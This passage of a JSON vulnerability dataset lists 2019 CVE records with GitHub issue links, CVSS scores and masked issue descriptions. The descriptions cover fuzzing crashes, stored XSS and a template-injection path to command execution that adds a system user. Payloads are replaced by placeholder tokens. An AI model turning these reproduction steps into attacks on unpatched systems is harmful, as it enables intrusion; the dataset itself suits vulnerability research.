  41353. "exploitabilityScore": 3.9
  41354. },
  41355. {
  41356. "CVE_ID": "CVE-2019-19957",
  41357. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/197",
  41358. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/197",
  41359. "Repo_new": "mz-automation/libiec61850",
  41360. "Issue_Created_At": "2019-12-24T08:51:15Z",
  41361. "description": "APITAG in APITAG in PATHTAG There is a out bound read vulnerability in APITAG because APITAG doesn't check APITAG , APITAG arguments. So APITAG and APITAG can be very large number. APITAG poc: FILETAG result in gdb: CODETAG",
  41362. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41363. "severity": "MEDIUM",
  41364. "baseScore": 6.5,
  41365. "impactScore": 3.6,
  41366. "exploitabilityScore": 2.8
  41367. },
  41368. {
  41369. "CVE_ID": "CVE-2019-19958",
  41370. "Issue_Url_old": "https://github.com/mz-automation/libiec61850/issues/198",
  41371. "Issue_Url_new": "https://github.com/mz-automation/libiec61850/issues/198",
  41372. "Repo_new": "mz-automation/libiec61850",
  41373. "Issue_Created_At": "2019-12-24T09:08:24Z",
  41374. "description": "integer signedness in APITAG in PATHTAG APITAG 's second argument is size which is a signed integer. If attacker supply a negtive number like NUMBERTAG APITAG will try to alloc a very large buffer that is size NUMBERTAG ffffffff in NUMBERTAG bit arch or NUMBERTAG ffffffffffffffff in NUMBERTAG bit arch. Most of the time alloc will failed then memcpy will get segment fault. APITAG poc: FILETAG gdb results: ERRORTAG",
  41375. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41376. "severity": "MEDIUM",
  41377. "baseScore": 6.5,
  41378. "impactScore": 3.6,
  41379. "exploitabilityScore": 2.8
  41380. },
  41381. {
  41382. "CVE_ID": "CVE-2019-19999",
  41383. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/419",
  41384. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/419",
  41385. "Repo_new": "halo-dev/halo",
  41386. "Issue_Created_At": "2019-12-11T10:44:41Z",
  41387. "description": "A Server Side Freemarker template injection vulnerability could cause remote command execution. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG RCE code is APITAG Then visit an arbitrary ERRORTAG page, this vulnerability is triggered. such as http: PATHTAG FILETAG",
  41388. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  41389. "severity": "HIGH",
  41390. "baseScore": 7.2,
  41391. "impactScore": 5.9,
  41392. "exploitabilityScore": 1.2
  41393. },
  41394. {
  41395. "CVE_ID": "CVE-2019-19999",
  41396. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/440",
  41397. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/440",
  41398. "Repo_new": "halo-dev/halo",
  41399. "Issue_Created_At": "2019-12-24T15:49:53Z",
  41400. "description": "unsafe template file permissions edit cause Server Side Template Injection(SSTI). APITAG \u6211\u786e\u5b9a\u6211\u5df2\u7ecf\u67e5\u770b\u4e86 (\u6807\u6ce8 APITAG \u4e3a APITAG ) ] APITAG \u4f7f\u7528\u6587\u6863 URLTAG FILETAG ] APITAG Wiki \u5e38\u89c1\u95ee\u9898 URLTAG x] [\u5176\u4ed6 Issues URLTAG \u6211\u8981\u7533\u8bf7 (\u6807\u6ce8 APITAG \u4e3a APITAG ) FILETAG Save the file and refresh home page,and then ceye platform can receive a message FILETAG Execute system command also edit \"page APITAG to execute system command to add system user. payload NUMBERTAG APITAG FILETAG save the file again and refresh home page APITAG will add user in the system FILETAG Remark Because the preview does not display the picture properly when editing the issus, you can visit my github project( URLTAG and view the picture. Solution Template files can only be edited locally, or check the file input",
  41401. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  41402. "severity": "HIGH",
  41403. "baseScore": 7.2,
  41404. "impactScore": 5.9,
  41405. "exploitabilityScore": 1.2
  41406. },
  41407. {
  41408. "CVE_ID": "CVE-2019-20008",
  41409. "Issue_Url_old": "https://github.com/archerysec/archerysec/issues/338",
  41410. "Issue_Url_new": "https://github.com/archerysec/archerysec/issues/338",
  41411. "Repo_new": "archerysec/archerysec",
  41412. "Issue_Created_At": "2019-12-03T02:59:59Z",
  41413. "description": "Stored XSS on the scheduler projects list. Upon a security analysis of the platform, a stored cross site scripting vulnerability was identified on the Web and Infrastructure Scan Scheduler's project dropdown selection. The payload is present on the project name attribute, but it is only executed upon javascript interaction by the Select2 library utilized on that specific menu. Upon deletion of the PATHTAG file, the vulnerability was not present anymore (as were the library functionalities). The vulnerability is not present on the python interactions, it is the live search function from select2 that evaluates and (possibly) decodes HTML Entities from the payload. How To Reproduce Steps to reproduce the behavior NUMBERTAG Create a project with the name \" ERRORTAG NUMBERTAG Click \" Launch Scans \" on the left side menu NUMBERTAG Proceed to either \" Dynamic Scans \" or \" Infrastructure Scans NUMBERTAG Click \" Scan Schedule NUMBERTAG Click the project dropdown selection Expected behavior After reproducing the steps above, a pop up should appear prompting the user with NUMBERTAG",
  41414. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  41415. "severity": "MEDIUM",
  41416. "baseScore": 5.4,
  41417. "impactScore": 2.7,
  41418. "exploitabilityScore": 2.3
  41419. },
  41420. {
  41421. "CVE_ID": "CVE-2019-20009",
  41422. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/176",
  41423. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/176",
  41424. "Repo_new": "libredwg/libredwg",
  41425. "Issue_Created_At": "2019-12-24T03:44:32Z",
  41426. "description": "Several bugs found by fuzzing. Hi, After fuzzing libredwg, I found the following bugs on the latest commit on master. Command: dwg2dxf APITAG APITAG input will lead to Memory allocation failed in dwg_decode_SPLINE_private APITAG APITAG URLTAG ASAN says: ERRORTAG Thanks, Linhlhq from Infiniti Team, APITAG (a member of Vingroup)",
  41427. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41428. "severity": "MEDIUM",
  41429. "baseScore": 6.5,
  41430. "impactScore": 3.6,
  41431. "exploitabilityScore": 2.8
  41432. },
  41433. {
  41434. "CVE_ID": "CVE-2019-20016",
  41435. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/84",
  41436. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/84",
  41437. "Repo_new": "hoene/libmysofa",
  41438. "Issue_Created_At": "2019-10-31T07:31:18Z",
  41439. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in dataobject.c at libmysofa NUMBERTAG Triggered by ./mysofa2json POC Poc overflow libmysofa2 URLTAG The ASAN information is as follows: ERRORTAG about code: CODETAG",
  41440. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41441. "severity": "MEDIUM",
  41442. "baseScore": 6.5,
  41443. "impactScore": 3.6,
  41444. "exploitabilityScore": 2.8
  41445. },
  41446. {
  41447. "CVE_ID": "CVE-2019-20016",
  41448. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/83",
  41449. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/83",
  41450. "Repo_new": "hoene/libmysofa",
  41451. "Issue_Created_At": "2019-10-31T07:21:20Z",
  41452. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in fractalhead.c at libmysofa NUMBERTAG Triggered by ./mysofa2json POC Poc overflow libmysofa1 URLTAG The ASAN information is as follows: ERRORTAG gdb debug info: ERRORTAG about code: ERRORTAG",
  41453. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41454. "severity": "MEDIUM",
  41455. "baseScore": 6.5,
  41456. "impactScore": 3.6,
  41457. "exploitabilityScore": 2.8
  41458. },
  41459. {
  41460. "CVE_ID": "CVE-2019-20017",
  41461. "Issue_Url_old": "https://github.com/tbeu/matio/issues/127",
  41462. "Issue_Url_new": "https://github.com/tbeu/matio/issues/127",
  41463. "Repo_new": "tbeu/matio",
  41464. "Issue_Created_At": "2019-11-07T03:14:45Z",
  41465. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackover APITAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG CODETAG",
  41466. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41467. "severity": "MEDIUM",
  41468. "baseScore": 6.5,
  41469. "impactScore": 3.6,
  41470. "exploitabilityScore": 2.8
  41471. },
  41472. {
  41473. "CVE_ID": "CVE-2019-20018",
  41474. "Issue_Url_old": "https://github.com/tbeu/matio/issues/129",
  41475. "Issue_Url_new": "https://github.com/tbeu/matio/issues/129",
  41476. "Repo_new": "tbeu/matio",
  41477. "Issue_Created_At": "2019-11-07T03:27:18Z",
  41478. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackoverflow APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41479. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41480. "severity": "MEDIUM",
  41481. "baseScore": 6.5,
  41482. "impactScore": 3.6,
  41483. "exploitabilityScore": 2.8
  41484. },
  41485. {
  41486. "CVE_ID": "CVE-2019-20019",
  41487. "Issue_Url_old": "https://github.com/tbeu/matio/issues/130",
  41488. "Issue_Url_new": "https://github.com/tbeu/matio/issues/130",
  41489. "Repo_new": "tbeu/matio",
  41490. "Issue_Created_At": "2019-11-07T03:44:40Z",
  41491. "description": "it is a memory exhaustion issue in APITAG APITAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc APITAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG CODETAG",
  41492. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41493. "severity": "MEDIUM",
  41494. "baseScore": 6.5,
  41495. "impactScore": 3.6,
  41496. "exploitabilityScore": 2.8
  41497. },
  41498. {
  41499. "CVE_ID": "CVE-2019-20020",
  41500. "Issue_Url_old": "https://github.com/tbeu/matio/issues/128",
  41501. "Issue_Url_new": "https://github.com/tbeu/matio/issues/128",
  41502. "Repo_new": "tbeu/matio",
  41503. "Issue_Created_At": "2019-11-07T03:23:25Z",
  41504. "description": "There is a stack based buffer overflow in the APITAG function of APITAG NUMBERTAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG stackover APITAG mat NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG about code NUMBERTAG ERRORTAG",
  41505. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41506. "severity": "MEDIUM",
  41507. "baseScore": 6.5,
  41508. "impactScore": 3.6,
  41509. "exploitabilityScore": 2.8
  41510. },
  41511. {
  41512. "CVE_ID": "CVE-2019-20021",
  41513. "Issue_Url_old": "https://github.com/upx/upx/issues/315",
  41514. "Issue_Url_new": "https://github.com/upx/upx/issues/315",
  41515. "Repo_new": "upx/upx",
  41516. "Issue_Created_At": "2019-11-14T03:04:37Z",
  41517. "description": "There is a heap buffer overflow in the APITAG function of APITAG A crafted input will lead to crash in p_mach.cpp at UP NUMBERTAG latest version,git clone from branch devel) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41518. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41519. "severity": "MEDIUM",
  41520. "baseScore": 5.5,
  41521. "impactScore": 3.6,
  41522. "exploitabilityScore": 1.8
  41523. },
  41524. {
  41525. "CVE_ID": "CVE-2019-20022",
  41526. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/108",
  41527. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/108",
  41528. "Repo_new": "saitoha/libsixel",
  41529. "Issue_Created_At": "2019-12-11T08:22:08Z",
  41530. "description": "Segmentation fault (ASAN: SEGV on unknown address) in the load_pnm function of APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG Triggered by: ./img2sixel NUMBERTAG SEGV load pnm NUMBERTAG Poc NUMBERTAG SEGV load pnm NUMBERTAG URLTAG The gdb debug info: ERRORTAG",
  41531. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41532. "severity": "MEDIUM",
  41533. "baseScore": 6.5,
  41534. "impactScore": 3.6,
  41535. "exploitabilityScore": 2.8
  41536. },
  41537. {
  41538. "CVE_ID": "CVE-2019-20023",
  41539. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/120",
  41540. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/120",
  41541. "Repo_new": "saitoha/libsixel",
  41542. "Issue_Created_At": "2019-12-18T05:03:40Z",
  41543. "description": "A memory leaks issue in image_buffer_resize at APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG git from the FILETAG ) Triggered by: ./img2sixel NUMBERTAG memleak rpl_malloc Poc NUMBERTAG memleak rpl_malloc URLTAG The ASAN info: ERRORTAG about code: ERRORTAG",
  41544. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41545. "severity": "MEDIUM",
  41546. "baseScore": 6.5,
  41547. "impactScore": 3.6,
  41548. "exploitabilityScore": 2.8
  41549. },
  41550. {
  41551. "CVE_ID": "CVE-2019-20024",
  41552. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/121",
  41553. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/121",
  41554. "Repo_new": "saitoha/libsixel",
  41555. "Issue_Created_At": "2019-12-18T05:10:27Z",
  41556. "description": "A heap buffer overflow in image_buffer_resize at APITAG A crafted input will lead to crash in frompnm.c at libsixel NUMBERTAG git from the FILETAG Triggered by: ./img2sixel NUMBERTAG heap Poc NUMBERTAG heap URLTAG The ASAN info: ERRORTAG about code: CODETAG",
  41557. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41558. "severity": "MEDIUM",
  41559. "baseScore": 6.5,
  41560. "impactScore": 3.6,
  41561. "exploitabilityScore": 2.8
  41562. },
  41563. {
  41564. "CVE_ID": "CVE-2019-20051",
  41565. "Issue_Url_old": "https://github.com/upx/upx/issues/313",
  41566. "Issue_Url_new": "https://github.com/upx/upx/issues/313",
  41567. "Repo_new": "upx/upx",
  41568. "Issue_Created_At": "2019-11-13T10:02:39Z",
  41569. "description": "Floating point exception abort APITAG in APITAG of APITAG A crafted input will lead to crash in APITAG at UP NUMBERTAG latest version,git clone from master) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41570. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41571. "severity": "MEDIUM",
  41572. "baseScore": 5.5,
  41573. "impactScore": 3.6,
  41574. "exploitabilityScore": 1.8
  41575. },
  41576. {
  41577. "CVE_ID": "CVE-2019-20052",
  41578. "Issue_Url_old": "https://github.com/tbeu/matio/issues/131",
  41579. "Issue_Url_new": "https://github.com/tbeu/matio/issues/131",
  41580. "Repo_new": "tbeu/matio",
  41581. "Issue_Created_At": "2019-11-12T05:36:29Z",
  41582. "description": "it is a memory leaks issue in APITAG APITAG A crafted input will lead to crash in mat5.c at matio NUMBERTAG Triggered by ./matdump POC Poc NUMBERTAG memleak URLTAG The ASAN information is as follows: ERRORTAG",
  41583. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41584. "severity": "MEDIUM",
  41585. "baseScore": 6.5,
  41586. "impactScore": 3.6,
  41587. "exploitabilityScore": 2.8
  41588. },
  41589. {
  41590. "CVE_ID": "CVE-2019-20053",
  41591. "Issue_Url_old": "https://github.com/upx/upx/issues/314",
  41592. "Issue_Url_new": "https://github.com/upx/upx/issues/314",
  41593. "Repo_new": "upx/upx",
  41594. "Issue_Created_At": "2019-11-14T01:57:00Z",
  41595. "description": "Segmentation fault (ASAN: SEGV on unknown address) in the APITAG function of APITAG A crafted input will lead to crash in p_lx_elf.cpp at UP NUMBERTAG latest version,git clone from master) Triggered by ./upx.out d f POC OS: Ubuntu NUMBERTAG LTS CPU architecture NUMBERTAG Poc NUMBERTAG URLTAG The ASAN information is as follows: ERRORTAG",
  41596. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41597. "severity": "MEDIUM",
  41598. "baseScore": 5.5,
  41599. "impactScore": 3.6,
  41600. "exploitabilityScore": 1.8
  41601. },
  41602. {
  41603. "CVE_ID": "CVE-2019-20056",
  41604. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/126",
  41605. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/126",
  41606. "Repo_new": "saitoha/libsixel",
  41607. "Issue_Created_At": "2019-12-29T13:43:51Z",
  41608. "description": "assertion failure in stbi__shiftsigned in stb_image.h. stbi__shiftsigned has assertion which can be triggered by user supplied image file. FILETAG poc: FILETAG result: ERRORTAG",
  41609. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41610. "severity": "MEDIUM",
  41611. "baseScore": 6.5,
  41612. "impactScore": 3.6,
  41613. "exploitabilityScore": 2.8
  41614. },
  41615. {
  41616. "CVE_ID": "CVE-2019-20057",
  41617. "Issue_Url_old": "https://github.com/ProxymanApp/Proxyman/issues/364",
  41618. "Issue_Url_new": "https://github.com/proxymanapp/proxyman/issues/364",
  41619. "Repo_new": "proxymanapp/proxyman",
  41620. "Issue_Created_At": "2019-12-29T04:38:45Z",
  41621. "description": "Helper Tool: Security Vulnerability . \ud83d\udc36 Brief There is a report from a dedicated user that Proxyman Helper Tool APITAG be exploited to change the System Proxy from unsigned apps. Basically, it's the same issue with Little Snitch CVETAG URLTAG since Proxyman and Little Snitch use a same FILETAG and we don't validate the codesign of incoming APITAG APITAG does good job to demonstrate how to install/uninstall the Help Tool and provide a mechanism to verify which app is authorized to do it. However, it doesn't validate the authenticity of the connections. As a result, Any apps could exploited by sending the connection to Helper Tool, which has the same APITAG We should fix it \ud83d\udc51 Criteria [ ] Validate the codesign of connections before performing any System Change [ ] Make sure one Helper Tool could verify and accept the Proxyman's Connection. [ ] Use POC sample code to verify that the new Helper Tool will reject the unauthorized connections",
  41622. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
  41623. "severity": "LOW",
  41624. "baseScore": 3.7,
  41625. "impactScore": 1.4,
  41626. "exploitabilityScore": 2.2
  41627. },
  41628. {
  41629. "CVE_ID": "CVE-2019-20058",
  41630. "Issue_Url_old": "https://github.com/bolt/bolt/issues/7830",
  41631. "Issue_Url_new": "https://github.com/bolt/bolt/issues/7830",
  41632. "Repo_new": "bolt/bolt",
  41633. "Issue_Created_At": "2019-12-17T13:13:09Z",
  41634. "description": "Unauthenticated Stored Cross Site Scripting (XSS) Admin Account Takeover NUMBERTAG Bug Summary: Stored Cross Site Scripting: Cross Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it. Scenario: When an end user is searching ( URLTAG for any results logs are being generated in admin panel ( FILETAG an end user inputs malicious payload such as URL Encoded: APITAG Decoded: APITAG Javascript is being executed on Database page of the admin panel ( URLTAG and unauthenticated attacker can use such malicious payloads to perform various exploits and APITAG keylogger, CSRF Token APITAG Aware Keylogger,etc NUMBERTAG Steps to Reproduce: Navigate to URLTAG Click on Search Input payload from above FILETAG To validate the finding login to admin console and navigate to URLTAG and select the log with payload navigate to database ( URLTAG Selecting Logs: FILETAG Navigating to Database: FILETAG Payload Executed: FILETAG NUMBERTAG Mitigation: Encode data on output. At the point where user controllable data is output in HTTP responses, encode the output to prevent it from being interpreted as active content. Depending on the output context, this might require applying combinations of HTML, URL, APITAG and CSS encoding. Filter input on arrival. At the point where user input is received, filter as strictly as possible based on what is expected or valid input. Content Security Policy. As a last line of defense, you can use Content Security Policy (CSP) to reduce the severity of any XSS vulnerabilities that still occur. References: URLTAG url URLTAG url URLTAG url FILETAG URLTAG url",
  41635. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  41636. "severity": "MEDIUM",
  41637. "baseScore": 6.1,
  41638. "impactScore": 2.7,
  41639. "exploitabilityScore": 2.8
  41640. },
  41641. {
  41642. "CVE_ID": "CVE-2019-20063",
  41643. "Issue_Url_old": "https://github.com/hoene/libmysofa/issues/67",
  41644. "Issue_Url_new": "https://github.com/hoene/libmysofa/issues/67",
  41645. "Repo_new": "hoene/libmysofa",
  41646. "Issue_Created_At": "2019-08-24T08:52:47Z",
  41647. "description": "Uninitialized use found in mysofa2json FILETAG )",
  41648. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41649. "severity": "HIGH",
  41650. "baseScore": 8.8,
  41651. "impactScore": 5.9,
  41652. "exploitabilityScore": 2.8
  41653. },
  41654. {
  41655. "CVE_ID": "CVE-2019-20086",
  41656. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/74",
  41657. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/74",
  41658. "Repo_new": "gopro/gpmf-parser",
  41659. "Issue_Created_At": "2019-10-15T07:06:48Z",
  41660. "description": "heap overflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC file FILETAG ERRORTAG",
  41661. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41662. "severity": "HIGH",
  41663. "baseScore": 8.8,
  41664. "impactScore": 5.9,
  41665. "exploitabilityScore": 2.8
  41666. },
  41667. {
  41668. "CVE_ID": "CVE-2019-20087",
  41669. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/76",
  41670. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/76",
  41671. "Repo_new": "gopro/gpmf-parser",
  41672. "Issue_Created_At": "2019-10-15T07:16:17Z",
  41673. "description": "heapoverflow in APITAG GPMF APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC FILETAG ERRORTAG",
  41674. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41675. "severity": "HIGH",
  41676. "baseScore": 8.8,
  41677. "impactScore": 5.9,
  41678. "exploitabilityScore": 2.8
  41679. },
  41680. {
  41681. "CVE_ID": "CVE-2019-20088",
  41682. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/77",
  41683. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/77",
  41684. "Repo_new": "gopro/gpmf-parser",
  41685. "Issue_Created_At": "2019-10-15T07:21:55Z",
  41686. "description": "heap overflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC POC FILETAG ERRORTAG",
  41687. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41688. "severity": "HIGH",
  41689. "baseScore": 7.8,
  41690. "impactScore": 5.9,
  41691. "exploitabilityScore": 1.8
  41692. },
  41693. {
  41694. "CVE_ID": "CVE-2019-20089",
  41695. "Issue_Url_old": "https://github.com/gopro/gpmf-parser/issues/75",
  41696. "Issue_Url_new": "https://github.com/gopro/gpmf-parser/issues/75",
  41697. "Repo_new": "gopro/gpmf-parser",
  41698. "Issue_Created_At": "2019-10-15T07:11:52Z",
  41699. "description": "heapoverflow in APITAG APITAG Tested in Ubuntu NUMBERTAG bit, master(ceb NUMBERTAG compiled by gcc g fsanitize=address Triggered by $ gpmf parse $POC FILETAG POC ERRORTAG",
  41700. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41701. "severity": "HIGH",
  41702. "baseScore": 7.8,
  41703. "impactScore": 5.9,
  41704. "exploitabilityScore": 1.8
  41705. },
  41706. {
  41707. "CVE_ID": "CVE-2019-20090",
  41708. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/461",
  41709. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/461",
  41710. "Repo_new": "axiomatic-systems/bento4",
  41711. "Issue_Created_At": "2019-12-09T08:53:39Z",
  41712. "description": "use after free in APITAG ./mp NUMBERTAG ts $poc out poc FILETAG asan output ERRORTAG",
  41713. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41714. "severity": "HIGH",
  41715. "baseScore": 7.8,
  41716. "impactScore": 5.9,
  41717. "exploitabilityScore": 1.8
  41718. },
  41719. {
  41720. "CVE_ID": "CVE-2019-20091",
  41721. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/462",
  41722. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/462",
  41723. "Repo_new": "axiomatic-systems/bento4",
  41724. "Issue_Created_At": "2019-12-09T09:00:42Z",
  41725. "description": "2 segv in mp NUMBERTAG ts. ./mp NUMBERTAG ts $poc out poc FILETAG FILETAG asan output NUMBERTAG ERRORTAG NUMBERTAG ERRORTAG",
  41726. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  41727. "severity": "MEDIUM",
  41728. "baseScore": 5.5,
  41729. "impactScore": 3.6,
  41730. "exploitabilityScore": 1.8
  41731. },
  41732. {
  41733. "CVE_ID": "CVE-2019-20094",
  41734. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/125",
  41735. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/125",
  41736. "Repo_new": "saitoha/libsixel",
  41737. "Issue_Created_At": "2019-12-25T00:03:38Z",
  41738. "description": "heap overflow in APITAG img2sixel I $POC FILETAG asan output ERRORTAG",
  41739. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41740. "severity": "HIGH",
  41741. "baseScore": 8.8,
  41742. "impactScore": 5.9,
  41743. "exploitabilityScore": 2.8
  41744. },
  41745. {
  41746. "CVE_ID": "CVE-2019-20140",
  41747. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/122",
  41748. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/122",
  41749. "Repo_new": "saitoha/libsixel",
  41750. "Issue_Created_At": "2019-12-22T13:23:47Z",
  41751. "description": "heap buffer overflow in gif_out_code at APITAG version : img2sixel NUMBERTAG OS : Ubuntu NUMBERTAG configured with: libcurl: yes libpng: yes libjpeg: yes gdk pixbuf2: no GD: no There is a heap buffer overflow in gif_out_code at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  41752. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  41753. "severity": "HIGH",
  41754. "baseScore": 8.8,
  41755. "impactScore": 5.9,
  41756. "exploitabilityScore": 2.8
  41757. },
  41758. {
  41759. "CVE_ID": "CVE-2019-20149",
  41760. "Issue_Url_old": "https://github.com/jonschlinkert/kind-of/issues/30",
  41761. "Issue_Url_new": "https://github.com/jonschlinkert/kind-of/issues/30",
  41762. "Repo_new": "jonschlinkert/kind-of",
  41763. "Issue_Created_At": "2019-12-16T01:04:23Z",
  41764. "description": "A vulnerability in APITAG We found that a maliciously crafted user input object can type checking result of kind of module. The vulnerability is from the following code: kind of leverages the built in constructor of unsafe user input to detect type information. However, a crafted payload can overwrite this builtin attribute to manipulate the type detection result. URLTAG Reproduce Script CODETAG This issue can be fixed by adding one simply check to the APITAG function: check ERRORTAG . This check can patch the vulnerability because attackers can't use json to send function instances to the victim server.",
  41765. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  41766. "severity": "HIGH",
  41767. "baseScore": 7.5,
  41768. "impactScore": 3.6,
  41769. "exploitabilityScore": 3.9
  41770. },
  41771. {
  41772. "CVE_ID": "CVE-2019-20159",
  41773. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1321",
  41774. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1321",
  41775. "Repo_new": "gpac/gpac",
  41776. "Issue_Created_At": "2019-10-28T16:03:11Z",
  41777. "description": "APITAG NUMBERTAG memory leaks of APITAG System info: Ubuntu NUMBERTAG LTS NUMBERTAG gcc NUMBERTAG gpac (master NUMBERTAG ada NUMBERTAG e) Compile Command: APITAG Run Command: APITAG POC file: URLTAG ASAN info: ERRORTAG",
